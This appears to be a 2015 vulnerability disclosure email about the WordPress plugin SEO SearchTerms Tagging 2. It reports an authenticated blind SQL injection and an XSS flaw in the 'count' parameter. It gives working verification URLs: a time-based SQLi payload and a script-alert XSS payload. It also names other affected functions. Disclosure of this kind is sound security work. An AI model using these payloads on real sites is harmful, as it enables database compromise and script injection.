Subject: Blind SQL injection and XSS in SEO SearchTerms Tagging 2 1.535
Date: Wed, 8 Jul 2015 14:21:33 +0200

Hello,

Plugin: SEO SearchTerms Tagging 2 1.535 https://wordpress.org/plugins/searchterms-tagging-2/

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection). There is also XSS with the same parameter.

1. SQL injection (pk_stt2_db_get_popular_terms())

Method: GET
Url: http://localhost/wp-admin/options-general.php?page=searchterms-tagging2.php&stats=1&count=[sqli]
Vulnerable parameter: count

Example PHP callstack:
pk_stt2_admin_print_searchterms   [/searchterms-tagging-2/searchterms-tagging2.php:239]
pk_stt2_db_get_popular_terms   [/searchterms-tagging-2/searchterms-tagging2.php:729]
wpdb::get_results


Verification:

http://localhost/wp-admin/options-general.php?page=searchterms-tagging2.php&stats=1&count=1,1%20PROCEDURE%20analyse((select%20extractvalue(rand(),(select%20benchmark(300000000,sha1(1))))),1);

Similar SQL injections in:

pk_stt2_db_get_search_terms
pk_stt2_db_get_recent_terms
pk_stt2_db_get_random_terms
pk_stt2_db_get_home_keywords
pk_stt2_db_get_popular_terms
pk_stt2_db_get_popular_tags
pk_stt2_db_get_last_promoted_post_title
pk_stt2_db_get_posts_wo_traffic



2. XSS 

Method: GET
Url:http://localhost/wp-admin/options-general.php?page=searchterms-tagging2.php&stats=1&count=[xss]
Vulnerable parameter: count

Verification:

http://localhost/wp-admin/options-general.php?page=searchterms-tagging2.php&stats=1&count=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E


--
Pozdrawiam,
Marcin Probola,